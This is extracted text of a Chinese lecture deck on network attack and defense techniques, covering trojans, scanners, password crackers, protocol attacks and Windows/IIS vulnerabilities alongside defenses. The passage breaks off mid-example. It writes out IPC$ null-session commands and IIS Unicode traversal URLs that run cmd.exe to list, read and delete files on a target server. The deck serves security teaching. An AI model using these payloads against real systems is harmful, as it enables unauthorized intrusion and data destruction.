网络攻防技术

关于网络攻防技术1第1页，讲稿共101页，2023年5月2日，星期三2本章概要

本章通过剖析常见的网络协议、操作系统与应用程序漏洞，分析黑客入侵的思路和方法，使得读者更深刻地理解应对黑客攻击采用的防范策略，以确保我们使用的网络和系统最大限度的安全。本章主要包括以下几部分：黑客的定义；基于协议的攻击手法和防御手段；常见的漏洞分析。第2页，讲稿共101页，2023年5月2日，星期三3课程目标通过本章的学习，读者应能够：了解当前主要网络安全弱点；了解黑客攻击手段，提升防范能力。第3页，讲稿共101页，2023年5月2日，星期三4提示本章将会介绍和使用部分黑客软件及相关工具模拟攻击过程，所有软件、工具都来自互联网，本身均可能会被程序作者或者第三方加以利用，种植木马、病毒等恶意程式。我们特别提醒严禁在生产机器（包括学校的网络）上进行安装、使用。严禁在没有老师的指导监督下进行任何模拟攻击实验。指导老师需要严格遵循本课程是严要求，按照实验手册操作，利用虚拟机技术并在物理隔离的网络方可进行模拟攻击演示。第4页，讲稿共101页，2023年5月2日，星期三54.1网络攻防概述随着互联网的迅猛发展，一些“信息垃圾”、“邮件炸弹”、“病毒木马”、“网络黑客”等越来越多地威胁着网络的安全，而网络攻击是最重要的威胁来源之一，所以有效的防范网络攻击势在必行，一个能真正能有效应对网络攻击的高手应该做到知己知彼，方可百战不殆。第5页，讲稿共101页，2023年5月2日，星期三64.1.1黑客简介今天，人们一谈到“黑客”（Hacker）往往都带着贬斥的意思，但是“黑客”的本来含义却并非如此。一般认为，黑客起源于20世纪50年代美国著名高校的实验室中，他们智力非凡、技术高超、精力充沛，热终于解决一个个棘手的计算机网络难题。60、70年代，“黑客”一词甚至于极富褒义，从事黑客活动意味着以计算机网络的最大潜力进行治理上的自由探索，所谓的“黑客”文化也随之产生了。然后并非所有的人都能恪守“黑客”文化的信条，专注于技术的探索，恶意的计算机网络破坏者、信息系统的窃密者随后层出不穷，人们把这部分主观上有恶意企图的人成为“骇客”（Cracker）,试图区别于“黑客”，同时也诞生了诸多的黑客分类方法，如“白帽子、黑帽子、灰帽子”。然而，不论主观意图如何，“黑客”的攻击行为在客观上会造成计算机网络极大的破坏，同时也是对隐私权的极大侵犯，所以在今天人们把那些侵入计算机网络的不速之客都成为“黑客”。第6页，讲稿共101页，2023年5月2日，星期三7黑客分类灰帽子破解者破解已有系统发现问题/漏洞突破极限/禁制展现自我计算机为人民服务漏洞发现-Flashsky软件破解-0Day工具提供-Glacier白帽子创新者设计新系统打破常规精研技术勇于创新没有最好，只有更好MS-BillGatesGNU-R.StallmanLinux-Linus善黑帽子破坏者随意使用资源恶意破坏散播蠕虫病毒商业间谍人不为己，天诛地灭入侵者-K.米特尼克CIH-陈盈豪攻击Yahoo者-匿名恶渴求自由黑客分类第7页，讲稿共101页，2023年5月2日，星期三8黑客文化H4x3r14n9u493i54diff3r3n714n9u493fr0m3n91i5h.w3c4nfind7hi514n9u493inh4x3r'5885,IRC0r07h3rCh477in9p14c3.常见替换A

=

4B

=

8E

=

3G=9l

=

1O

=

0S

=

5t

=

7Z

=

2常见缩写CK=xYou=uAre=rSee=cAnd=n/&Not=!黑客文化第8页，讲稿共101页，2023年5月2日，星期三94.1.2网络攻击防御体系从系统安全的角度可以把网络安全的研究内容分为两大体系：网络攻击和网络防御。第9页，讲稿共101页，2023年5月2日，星期三104.1.3网络攻击的分类攻击方法的分类是安全研究的重要课题，对攻击的定性和数据挖掘的方法来分析漏洞有重要意义。对于系统安全漏洞的分类法主要有两种：RISOS分类法和Aslam分类法，对于针对TCP/IP协议族攻击的分类也有几种。第10页，讲稿共101页，2023年5月2日，星期三111按照TCP/IP协议层次进行分类这种分类是基于对攻击所属的网络层次进行的，TCP/IP协议传统意义上分为四层，攻击类型可以分成四类：(1)针对数据链路层的攻击（如ARP欺骗）(2)针对网络层的攻击（如Smurf攻击、ICMP路由欺骗）(3)针对传输层的攻击（如SYN洪水攻击、会话劫持）(4)针对应用层的攻击（如DNS欺骗和窃取）第11页，讲稿共101页，2023年5月2日，星期三122按照攻击者目的分类按照攻击者的攻击目的可分为以下几类：（1）DOS（拒绝服务攻击）和DDOS（分布式拒绝服务攻击）。（2）Sniffer监听。第12页，讲稿共101页，2023年5月2日，星期三132按照攻击者目的分类（3）会话劫持与网络欺骗。（4）获得被攻击主机的控制权，针对应用层协议的缓冲区溢出基本上目的都是为了得到被攻击主机的shell。第13页，讲稿共101页，2023年5月2日，星期三14按危害范围可分为以下两类：（1）局域网范围。如sniffer和一些ARP欺骗。（2）广域网范围。如大规模僵尸网络造成的DDOS。3按危害范围分类第14页，讲稿共101页，2023年5月2日，星期三154.1.4网络攻击步骤网络攻击步骤可以说变幻莫测，但纵观其整个攻击过程，还是有一定规律可循的，一般可以分：攻击前奏、实施攻击、巩固控制、继续深入几个过程。下面我们来具体了解一下这几个过程。第15页，讲稿共101页，2023年5月2日，星期三164.1.4网络攻击步骤假设某黑客想人侵某企业网络中心一台Win2000的Web服务器，入侵的目标为拿到”Win2000的管理员账户或者修改网站首页。他可能的攻击思路流程大致如右图所示。第16页，讲稿共101页，2023年5月2日，星期三174.2网络攻防工具所谓网络攻防工具是指编写出来用于网络攻击和防御方面的工具软件，其功能是执行一些诸如扫描端口，防止黑客程序入侵，监测系统等，有些是用来防御，而有些则是以恶意攻击为目的攻击性软件，常见的有木马程序，病毒程序，炸弹程序等，另外还有一部分软件是为了破解某些软件或系统的密码而编写的，一般也出于非正当的目的。我们可以通过它们了解网络的攻击手段，掌握防御网络攻击的方法，堵住可能出现的各种漏洞。第17页，讲稿共101页，2023年5月2日，星期三184.2.1木马程序一般的木马都有客户端和服务器端两个执行程序，其中客户端是用于黑客远程控制植入木马的机器的程序，服务器端程序即是木马程序。如果攻击者要通过木马入侵你的系统，他所要做的第一步就是要让木马的服务器端程序在你的计算机中运行。一旦运行成功，木马程序就可以获得系统管理员的权限，在用户毫无觉察的情况下，对计算机做任何能做的事情。第18页，讲稿共101页，2023年5月2日，星期三191.冰河冰河是一个优秀的国产木马程序，它功能众多，几乎涵盖了所有Windows的常用操作，并具有简单、明了的中文使用界面。冰河采用标准的C/S结构，包括客户端程序(G_Client.exe)和服务器端程序(G_Server.exe)，客户端的图标是一把打开的瑞士军刀，服务器端则看起来是个微不足道的程序，但就是这个程序在计算机上执行以后，该计算机的7626号端口就对外开放了。如果在客户端输入其IP地址或者主机名，就可完全控制这台计算机了。第19页，讲稿共101页，2023年5月2日，星期三20它可以自动跟踪目标机器的屏幕变化；可以完全模拟键盘及鼠标输入；可以记录各种口令信息，包括开机口令、屏保口令、各种共享资源口令以及绝大多数在对话框中出现过的口令信息；可以获取系统信息，包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据；它还可以限制系统功能、进行远程文件操作及注册表操作，同时它还具有发送信息和点对点通讯的能力。第20页，讲稿共101页，2023年5月2日，星期三21第21页，讲稿共101页，2023年5月2日，星期三222.蓝色火焰蓝色火焰是一款有实力、有新意的木马，它放弃了作为远程监控工具的客户端程序，直接利用现有网络相关的程序来控制服务器端。这一特色使蓝色火焰这个“没有客户端的木马”逐渐成为了许多黑客必备的工具之一。蓝色火焰具有的网络特性可以通过一些代理服务器控制服务端，选择好的控制工具(如Sterm或Cuteftp)便可以实现用Socket代理控制，更好的隐蔽了自己的IP。第22页，讲稿共101页，2023年5月2日，星期三23蓝色火焰木马通过蓝色火焰配置器生成，如图所示第23页，讲稿共101页，2023年5月2日，星期三243.灰鸽子灰鸽子是一个功能强大的远程控制类软件，它与同类木马软件不同的是采用了“反弹端口原理”的连接方式，可以在互联网上访问到局域网内通过透明代理上网的电脑，并且可以穿过某些防火墙。灰鸽子分为客户端与服务端，软件在下载安装后没有服务端，只有客户端H_Clien.exe，服务器端是要通过配置生成。第24页，讲稿共101页，2023年5月2日，星期三25现在的木马层出不穷，数不胜数，比较出名的还有诸如BO2K、广外女生、网络神偷、黑洞2001、无赖小子等等，令人防不胜防。我们应注意这方面的信息，做好对木马的防御和清除工作。一般来说，要作到以下三点：(1)不轻易运行来历不明的软件；(2)及时升级杀毒软件，使病毒库保持最新；(3)安装并运行防火墙。第25页，讲稿共101页，2023年5月2日，星期三264.2.2扫描工具扫描工具是一种能够自动检测远程或本地主机安全弱点的程序，通过它可以获得远程计算机的各种端口分配及提供的服务和它们的版本。扫描器工作时是通过选用不同的TCP/IP端口的服务，并记录目标主机给予的应答，以此搜集到关于目标主机的各种有用信息的。第26页，讲稿共101页，2023年5月2日，星期三271.流光流光是国内最著名的扫描、入侵工具，集端口扫描、字典工具、入侵工具、口令猜解等多种功能于一身，界面豪华，功能强大。它可以探测POP3、FTP、SMTP、IMAP、SQL、IPC、IIS、FINGER等各种漏洞，并针对各种漏洞设计了不同的破解方案，能够在有漏洞的系统上轻易得到被探测的用户密码。第27页，讲稿共101页，2023年5月2日，星期三282.SuperscanSuperscan是一个功能强大的端口扫描工具，它可以通过Ping来检验目标计算机是否在线，支持IP和域名相互转换，还可以检验一定范围内目标计算机的端口情况和提供的服务类别。Superscan可以自定义要检验的端口，并可以保存为端口列表文件，它还自带了一个木马端口列表，通过这个列表可以检测目标计算机是否有木马，同时用户也可以自己定义、修改这个木马端口列表。在Superscan找到的主机上，单击右键可以实现HTTP浏览、TELNET登陆、FTP上传、域名查询等功能。第28页，讲稿共101页，2023年5月2日，星期三293.x-way2.5x-way2.5是一个主要采用多线程形式对服务器系统进行漏洞扫描和安全测试的工具。同流光一样，它最大的特点也是高集成度，除了拥有类似于流光中的IIS远程命令及SQL远程命令外，还拥有流光目前不具备的一些功能，在这一点上，x-way2.5与流光相比，毫不逊色。第29页，讲稿共101页，2023年5月2日，星期三304.SSSSSS（ShadowSecurityScanner）是俄罗斯的一套非常专业的安全漏洞扫描软件，能够扫描目标服务器上的各种漏洞，包括很多漏洞扫描、端口扫描、操作系统检测、账号扫描等等，而且漏洞数据可以随时更新，第30页，讲稿共101页，2023年5月2日，星期三314.2.3破解工具利用破解工具我们可以检查密码的安全性及找回忘记的密码，但用心不良的人也可以用它来破解他人的密码，以达自己不可告人的目的。根据破解原理的不同，破解工具大致可分为穷举法破解器和查看法破解器两种。穷举法，又叫暴力破解法，其过程是从字典文件里抽出一个字段来和要破解的密码进行对比，直到破解出密码或字典里的字段全部试完为止。这种守株待兔的方法看似简单，但由于黑客字典通常包含了很多黑客经验的累积，所以此法对于安全意识不强的用户，破解率是很高的。查看法是指程序通过嗅探或系统漏洞来获得密码文件的方法。第31页，讲稿共101页，2023年5月2日，星期三321.溯雪溯雪是一款优秀的密码探测工具，它可以利用ASP、CGI对免费信箱进行密码探测，其运行原理是，通过提取ASP、CGI页面表单，搜寻表单运行后的错误标志，有了错误标志后，再挂上字典文件来破解信箱密码。第32页，讲稿共101页，2023年5月2日，星期三332.网络刺客II网络刺客是天行软件的经典之作，软件的最大作用就是，当有人在局域网中使用的POP3、FTP、Telnet服务时，网络刺客II就可以截获其中的密码。程序的II代同I代相比，无论在功能、性能、技术上都有了长足的进步，I代只相当于II代的一个微小子集。第33页，讲稿共101页，2023年5月2日，星期三343.黑雨黑雨是一款非常优秀的POP3邮箱密码暴力破解器。它可以验证用户名和密码是否正确，并独创了深度和广度两种破解算法。深度算法是一种很特殊的算法，如果密码位数猜得准，就可以将破解时间缩短30%-70%。广度算法是一种老实的算法，现大多数类似功能的工具都采用它，其对3位以下的短小密码非常有效。总的来看，黑雨软件的特色为独创了多项算法，简单、易用且功能强大。第34页，讲稿共101页，2023年5月2日，星期三354.2.4炸弹工具炸弹攻击的基本原理是利用特殊工具软件，在短时间内向目标机集中发送大量超出系统接收范围的信息或者垃圾信息，目的在于使对方目标机出现超负荷、网络堵塞等状况，从而造成目标的系统崩溃及拒绝服务。常见的炸弹有邮件炸弹、逻辑炸弹、聊天室炸弹等。第35页，讲稿共101页，2023年5月2日，星期三364.2.5安全防御工具使用安全防御工具可以帮助我们抵挡网络入侵和攻击，防止信息泄露，并可以根据可疑的信息，来跟踪、查找攻击者。下面就一些经常使用的安全防御工具做出说明。第36页，讲稿共101页，2023年5月2日，星期三371.木马克星木马克星是一款专门针对国产木马的软件。如图4-12所示，该软件是动态监视网络与静态特征字扫描的完美结合，可以查杀5021种国际木马，112种电子邮件木马，保证查杀冰河类文件，关联木马，QQ类寄生木马，ICMP类幽灵木马，网络神偷类反弹木马，并内置木马防火墙，任何黑客试图与本机建立连接，都需要木马克星的确认，不仅可以查杀木马，还可以查黑客。第37页，讲稿共101页，2023年5月2日，星期三382.Lockdown2000Lockdown2000是一款功能强大的网络安全工具，能够清除木马，查杀邮件病毒，防止网络炸弹攻击，还能在线检测所有对本机的访问并进行控制。Lockdown2000专业版完全可以胜任本机防火墙的工作。在Lockdown2000专业版中总共有13个功能模块，包括木马扫描器、端口监视器、共享监视器、连接监视器、进程监视器、网络监视器、网络工具包等，涉及到网络安全的方方面面。如果能合理的配置Lockdown2000专业版，并结合其它工具，其功能完全可以强过一些中小企业级防火墙。第38页，讲稿共101页，2023年5月2日，星期三393.Recover4allProfessional2.15Recover4allProfessional2.15是Windows系统下短小精悍、功能强大的文件反删除工具，可用于恢复被黑客删除的数据。其原理为，当删除一个文件时，系统并不是到每个簇去清除该文件的内容，而仅仅是把ROOT里面文件名的第一个字符换成一个特殊的字符，以标记这个文件被删除而已。Recover4allProfessional2.15可以把此过程逆向操作，即可恢复文件了。第39页，讲稿共101页，2023年5月2日，星期三404.Windows漏洞的安全扫描工具工具一：MBSAMBSA（MicrosoftBaselineSecurityAnalyzer，微软基准安全分析器），该软件能对Windows、Office、IIS、SQLServer等软件进行安全和更新扫描，扫描完成后会用“X”将存在的漏洞标示出来，并提供相应的解决方法来指导用户进行修补。工具二：UpdatescanUPDATESCAN是微软公司针对每月发布的补丁所开发的补丁扫描工具，不同于MBSA的是，每月UPDATESCAN都会有新的版本。第40页，讲稿共101页，2023年5月2日，星期三414.3基于协议的攻击技术与防御技术针对协议的攻击手段非常多样，下面对常见的协议攻击方式进行探讨，主要内容包括：ARP协议漏洞攻击；ICMP协议漏洞攻击；TCP协议漏洞攻击；各种协议明文传输攻击。第41页，讲稿共101页，2023年5月2日，星期三424.3.1ARP协议漏洞攻击与防御ARP协议（AddressResolveProtocol,地址解析协议）工作在TCP/IP协议的第二层—数据链路层，用于将IP地址转换为网络接口的硬件地址（媒体访问控制地址，即MAC地址）。无论是任何高层协议的通信，最终都将转换为数据链路层硬件地址的通讯。在每台主机的内存中，都有一个ARPMAC的转换表，保存最近获得的IP与MAC地址对应。ARP表通常是动态更新的（注意在路由中，该ARP表可以被设置成静态）。默认情况下，但其中的缓存项超过两分钟没有活动时，此缓存项就会超时被删除。第42页，讲稿共101页，2023年5月2日，星期三43漏洞描述ARP协议最大的缺陷是：当主机收到ARP数据包时，不会进行任何验证就刷新Cache，记录下错误的IP/MAC对，给ARP欺骗带来机会，造成ARP

Cache中毒。基于此原理，可以用来精心地构造中间人攻击或者DOS攻击，如arptool可以实现中间人这种攻击，轻者导致网络不能正常工作（如网络执法官），重则成为黑客入侵跳板，从而给网络安全造成极大隐患。第43页，讲稿共101页，2023年5月2日，星期三44信任关系CAB(同一网段的arp欺骗)攻击实现第44页，讲稿共101页，2023年5月2日，星期三45ARP欺骗防范知道了ARP欺骗的方法和危害，下面列出了一些防范方法(1)不要把你的网络安全信任关系建立在IP地址的基础上或硬件MAC地址基础上(RARP同样存在欺骗的问题)，较为理想的信任关系应该建立在IP+MAC基础上。(2)设置在本机和网关设置静态的MAC--IP对应表，不要让主机刷新你设定好的转换表。在三层交换机上设定静态ARP表。第45页，讲稿共101页，2023年5月2日，星期三46(3)除非很有必要，否则停止使用ARP，将ARP作为永久条目保存在对应表中。在Linux下可以用ifconfig－arp可以使网卡驱动程序停止使用ARP。(4)在本机地址使用ARP，发送外出的通信使用代理网关。第46页，讲稿共101页，2023年5月2日，星期三47(5)修改系统拒收ICMP重定向报文，在Linux下可以通过在防火墙上拒绝ICMP重定向报文或者是修改内核选项重新编译内核来拒绝接收ICMP重定向报文。在windows2000下可以通过防火墙和IP策略拒绝接收ICMP报文第47页，讲稿共101页，2023年5月2日，星期三484.3.2ICMP协议漏洞攻击与防御

1漏洞描述

ICMP是"InternetControlMessageProtocol"(Internet控制消息协议)的缩写，是传输层的重要协议。它是TCP/IP协议簇的一个子协议，用于IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。所以许多系统和防火墙并不会拦截ICMP报文，这给攻击者带来可乘之机。网上有很多针对ICMP的攻击工具可以很容易达到攻击目的，其攻击实现目标主要为转向连接攻击和拒绝服务，下图所示是一个简单的针对ICMP的攻击工具。第48页，讲稿共101页，2023年5月2日，星期三49ICMP攻击工具第49页，讲稿共101页，2023年5月2日，星期三50

2攻击实现（1）ICMP转向连接攻击：攻击者使用ICMP“时间超出”或“目标地址无法连接”的消息。这两种ICMP消息都会导致一台主机迅速放弃连接。攻击只需伪造这些ICMP消息中的一条，并发送给通信中的两台主机或其中的一台，就可以利用这种攻击了。接着通信连接就会被切断。当一台主机错误地认为信息的目标地址不在本地网络中的时候，网关通常会使用ICMP“转向”消息。如果攻击者伪造出一条“转向”消息，它就可以导致另外一台主机经过攻击者主机向特定连接发送数据包。第50页，讲稿共101页，2023年5月2日，星期三51(2)ICMP数据包放大(ICMPSmurf)：攻击者向安全薄弱网络所广播的地址发送伪造的ICMP响应数据包。那些网络上的所有系统都会向受害计算机系统发送ICMP响应的答复信息，占用了目标系统的可用带宽并导致合法通信的服务拒绝(DoS)。一个简单的Smurf攻击，通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(Ping)来淹没受害主机的方式进行，最终导致该网络的所有主机都对此ICMP应答请求做出答复，导致网络阻塞，比pingofdeath洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方雪崩。第51页，讲稿共101页，2023年5月2日，星期三52(3)死Ping攻击(PingofDeath)：由于在早期的阶段，路由器对包的最大尺寸都有限制，许多操作系统对TCP/IP栈的限制在ICMP包上都是规定64KB，并且在对包的标题头进行读取之后，要根据该标题头里包含的信息来为有效载荷生成缓冲区，当产生畸形的，声称自己的尺寸超过ICMP上限的包，也就是加载的尺寸超过64KB上限时，就会出现内存分配错误，导致TCP/IP堆栈崩溃，致使接受方当机。第52页，讲稿共101页，2023年5月2日，星期三53(4)ICMPPing淹没攻击：大量的PING信息广播淹没了目标系统，使得它不能够对合法的通信做出响应。(5)ICMPnuke攻击：Nuke发送出目标操作系统无法处理的信息数据包，从而导致该系统瘫痪。(6)通过ICMP进行攻击信息收集：通过Ping命令来检查目标主机是否存活，依照返回TTL值判断目标主机操作系统。(如：LINUX应答的TTL字段值为64；UNIX应答的TTL字段值为255；Windows95/98/Me应答的TTL字段值为32；Windows2000/NT应答的TTL字段值为128)。第53页，讲稿共101页，2023年5月2日，星期三54第54页，讲稿共101页，2023年5月2日，星期三554.3.3TCP协议漏洞攻击与防御1.漏洞描述TCP(传输控制协议，TransportControlProtocol)是一种可靠的面向连接的传送服务。它在传送数据时是分段进行的，主机交换数据必须建立一个会话。它用比特流通信，即数据被作为无结构的字节流。通过每个TCP传输的字段指定顺序号，以获得可靠性。针对TCP协议的攻击的基本原理是：TCP协议三次握手没有完成的时候，被请求端B一般都会重试（即再给A发送SYN＋ACK报文）并等待一段时间（SYNtimeout），这常常被用来进行DOS攻击或者Land攻击。在Land攻击中，一个特别打造的SYN包其原地址和目标地址都被设置成某一个服务器地址，此举将导致接收服务器向它自己的地址发送SYN-ACK消息，结果该地址又发回ACK消息并创建一个空连接，每一个这样的连接都将保留直至超时。对Land攻击反应不同，许多UNIX系统将崩溃，NT变得极其缓慢。第55页，讲稿共101页，2023年5月2日，星期三562.攻击实现在SYNFlood攻击中，攻击机器向受害主机发送大量伪造源地址的TCPSYN报文，受害主机分配必要的资源，然后向源地址返回SYN＋ACK包，并等待源端返回ACK包，如所示。第56页，讲稿共101页，2023年5月2日，星期三57第57页，讲稿共101页，2023年5月2日，星期三583.防御方法针对SYNFlood的攻击防御措施主要有：一类是通过防火墙、路由器等过滤网关防护，另一类是通过加固TCP/IP协议栈防御。网关防护的主要技术有：SYN-cookie技术和基于监控的源地址状态、缩短SYNTimeout时间。SYN-cookie技术实现了无状态的握手，避免SYNFlood的资源消耗。基于监控的源地址状态技术能够对每一个连接服务器的IP地址的状态进行监控，主动采取措施避免SYNFlood攻击的影响。第58页，讲稿共101页，2023年5月2日，星期三594.3.4其他协议明文传输漏洞攻击与防御1.漏洞描述TCP/IP协议数据流采用明文传输，是网络安全的一大隐患，目前所使用的Ftp、Http、POP和Telnet服务在本质上都是不安全的，因为它们在网络上用明文传送口令和数据，攻击者可以很容易地通过嗅探等方式截获这些口令和数据。第59页，讲稿共101页，2023年5月2日，星期三60嗅探侦听主要有两种途径，一种是将侦听工具软件放到网络连接的设备或者放到可以控制网络连接设备的电脑上，这里的网络连接设备指的是网关服务器、路由器等。另外一种是针对不安全的局域网（采用交换Hub实现），放到个人电脑上就可以实现对整个局域网的侦听。第60页，讲稿共101页，2023年5月2日，星期三612.攻击实现网络抓包工具目前很多，如HTTPSniffer、SpyNet、Sniffit、Ettercap、Snarp、IRIS。这里要使用到一款抓包工具WinsockExpert，它可以用来监视和截获指定进程网络数据的传输，对测试Http通信过程非常有用。黑客经常使用该工具来修改网络发送和接收数据，协助完成很多网页脚本的入侵工作。第61页，讲稿共101页，2023年5月2日，星期三623.防御方法(1)从逻辑或物理上对网络分段，网络分段通常被认为是控制网络广播风暴的一种基本手段，但其实也是保证网络安全的一项措施。其目的是将非法用户与敏感的网络资源相互隔离，从而防止可能的非法监听。(2)以交换式集线器代替共享式集线器，使单播包仅在两个节点之间传送，从而防止非法监听。当然，交换式集线器只能控制单播包而无法控制广播包（Broadcastpacket）和多播包（MulticastPacket）。但广播包和多播包内的关键信息，要远远少于单播包。(3)使用加密技术，数据经过加密后，通过监听仍然可以得到传送的信息，但显示的是乱码。使用加密协议对敏感数据进行加密，对于Web服务器敏感数据提交可以使用https代理http；用PGP（PGP--PrettyGoodPrivacy是一个基于RSA公钥加密体系的邮件加密软件，它提出了公共钥匙或不对称文件加密和数字签名）对邮件进行加密。第62页，讲稿共101页，2023年5月2日，星期三63(4)划分VLAN，运用VLAN（虚拟局域网）技术，将以太网通信变为点到点通信，可以防止大部分基于网络监听的入侵。(5)使用动态口令技术，使得侦听结果再次使用时无效。第63页，讲稿共101页，2023年5月2日，星期三644.4操作系统漏洞攻击技术与防御技术无论是UNIX、Windows还是其他操作系统都存在着安全漏洞。主流操作系统Windows更是众矢之的，每次微软的系统漏洞被发现后，针对该漏洞利用的恶意代码很快就会出现在网上，一系列案例证明。从漏洞被发现到恶意代码出现，中间的时差开始变得越来越短，所以必须时刻关注操作系统的最新漏洞，以保证系统安全。第64页，讲稿共101页，2023年5月2日，星期三654.4.1输入法漏洞攻击与防御1.漏洞描述在安装Windows2000简体中文版的过程中，默认情况下同时安装了各种简体中文输入法。而Microsoft自Windows2000开始，支持中文用户名。这些随系统装入的输入法可以在系统登录界面中使用，以便用户能使用基于中文字符的用户标识和密码登录到系统，理论上，在未登陆情况下，应限制提供给用户的系统功能。然而，在SP2补丁以前，默认安装的情况下，Windows2000中的简体中文输入法不能正确地检测当前的状态，导致在系统登录界面中提供了不应有的功能。进而，一些别有用心的用户可以通过直接操作该系统的登陆界面得到当前系统权限，运行其选择的代码，更改系统配置，新建用户，添加或删除系统服务，添加、更改或删除数据，或执行其他非法操作。第65页，讲稿共101页，2023年5月2日，星期三662.攻击实现针对输入法漏洞的攻击有本地和远程两种攻击方式，这种攻击方式可以使本地用户绕过身份验证机制进入系统内部。针对输入法漏洞的本地攻击针对输入法漏洞的远程攻击第66页，讲稿共101页，2023年5月2日，星期三673.防御方法采取以下一些预防措施，可以有效杜绝黑客的攻击:(1)给Windows2000打补丁到SP4（如打补丁到SP4不需要进行第2项操作）。(2)删除输入法帮助文件和多余的输入法。为了防止恶意用户通过输入法漏洞对服务器进行攻击，删除不需要的输入法和输入法的帮助文件。这些帮助文件通常在Windows2000的安装目录下（如:C:\Windows）的Help目录下，对应的帮助文件分别是:Windowsime.chm输入法操作指南；

Windowssp.chm双拼输入法帮助；

Windowszm.chm郑码输入法帮助。(3)防止别人恶意利用net.exe，可以考虑将其移出c:\winnt\system32目录，或者改名。但自己应记住更改的目录或新的文件名。第67页，讲稿共101页，2023年5月2日，星期三684.4.2IPC$攻击与防御1.漏洞描述IPC$(InternetProcessConnection）是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$漏洞，其实IPC$本身并不是一个真正意义上的漏洞，其主要漏洞在于其允许空会话（Nullsession）。空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码）。第68页，讲稿共101页，2023年5月2日，星期三692.攻击实现对于WindowsNT系列的操作系统，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，但这对黑客来说并没有什么太大的利用价值；对Windows2000作用更小，因为在Windows2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。第69页，讲稿共101页，2023年5月2日，星期三70单从上述描述来看，空会话好像并无多大用处，但从一次完整的IPC$入侵来看，空会话是一个不可缺少的跳板，以下是空会话中能够使用的一些具体命令。(1)建立一个空会话（当然，这需要目标开放IPC$）。命令如下:netuse\\ip\ipc$""/user:"“(2)查看远程主机的共享资源。命令如下:netview\\ip第70页，讲稿共101页，2023年5月2日，星期三71(3)查看远程主机的当前时间。命令如下:nettime\\ip(4)得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）。命令如下:netstat－Aip(5)删除ipc$连接netuse\\ip\ipc$/del第71页，讲稿共101页，2023年5月2日，星期三724.4.3RPC（RemoteProcedureCall）漏洞攻击与防御1.漏洞描述远程过程调用（RemoteProcedureCall，简称RPC）是一种协议，程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用RPC的程序不必了解支持通信的网络协议的情况，因此，RPC提高了程序的互操作性。Microsoft的RPC部分在通过TCP/IP处理信息交换时存在问题，远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。RPC漏洞是由于WindowsRPC服务在某些情况下不能正确检查消息输入而造成的。如果攻击者在RPC建立连接后发送某种类型的格式不正确的RPC消息，则会导致远程计算机上与RPC之间的基础分布式组件对象模型拒绝服务，分布式对象模型（DCOM）是一种能够使软件组件通过网络直接进行通信的协议。冲击波（Worm.Blaster）病毒和高波（Worm_Agobot）蠕虫病毒也是针对此漏洞进行传播，造成大范围危害。

第72页，讲稿共101页，2023年5月2日，星期三732.攻击实现黑客也会利用此漏洞进行攻击，通过Retina(R)就可以很容易扫描一个网段存在RPC漏洞隐患的机器。第73页，讲稿共101页，2023年5月2日，星期三74第74页，讲稿共101页，2023年5月2日，星期三753.防御RPC漏洞RPC采取以下一些措施可以有效防御RPC攻击:(1)通过防火墙关闭135端口。(2)更新最新补丁。第75页，讲稿共101页，2023年5月2日，星期三764.5针对IIS漏洞攻击技术与防御技术MicrosoftIIS是允许在公共Intranet或Internet上发布信息的Web服务器，IIS可以提供HTTP、FTP、gopher服务。IIS本身的安全性能并不理想，漏洞层出不穷，如MDAC弱点漏洞、ida＆idq漏洞、printer漏洞、Unicode编码、目录遍历漏洞、WebDAV远程缓冲区溢出漏洞等，使得针对IIS服务器的攻击事件频频发生。第76页，讲稿共101页，2023年5月2日，星期三774.5.1Unicode漏洞攻击与防御1.漏洞分析Unicode为一个ISO国际标准，它包含了世界各国的常用文字，可支持数百万个字码。它的目的是统一世界各国的字符编码。许多操作系统，最新的浏览器和其他产品都支持Unicode编码。IIS4.0、IIS5.0在使用Unicode解码时存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当用户用IIS打开文件时，如果该文件名包含Unicode字符，系统会对其进行解码。如果用户提供一些特殊的编码请求，将导致IIS错误地打开或者执行某些Web根目录以外的文件。第77页，讲稿共101页，2023年5月2日，星期三78Unicode漏洞影响的版本有:从中文WindowsIIS4.0＋SP6开始，还影响中文Windows2000＋IIS5.0、中文Windows2000＋IIS5.S+SP1。繁体中文版也同样存在这样的漏洞。它们利用扩展Unicode字符（如利用“../”取代“/”和“\”）进行目录遍历漏洞。“\”在WindowsNT中编码为%c1%9c，在Windows2000英文版中编码为%c0%af。第78页，讲稿共101页，2023年5月2日，星期三792.漏洞攻击首先介绍入侵者在入侵存在UNICODE漏洞的服务器时所涉及到的有关命令，其实有些命令和在DOS下使用的命令是一样的，但如cd这一类命令则不可用。下面以02作为攻击的目标主机（存在UNICODE漏洞的服务器）介绍与UNICODE漏洞所涉及到的有关命令。第79页，讲稿共101页，2023年5月2日，星期三80(1)dir命令列出目标计算机的目录。在浏览器的地址栏中输入如下内容：02/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\(2)显示下一个目录可在浏览器的地址栏中输入如下内容：02/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\Inetpub(3)type命令显示文件内容。可以在浏览器中显示txt、htm、asp等格式的内容，如要显示C盘下config.txt文件的内容，可在浏览器的地址栏中输入如下内容：02/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\config.txt(4)del命令删除文件命令。例如，要删除C盘下的config.txt文件，可在浏览器的地址栏中输入如下内容：02/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\config.txt第80页，讲稿共101页，2023年5月2日，星期三81(5)copy命令复制指定文件或同时将该文件改名，例如将c盘Winnt\system32下的cmd.exe程序复制到C盘Inetpub\scripts下，并改名为win.exe，可在浏览器的地址栏中输入如下内容：02/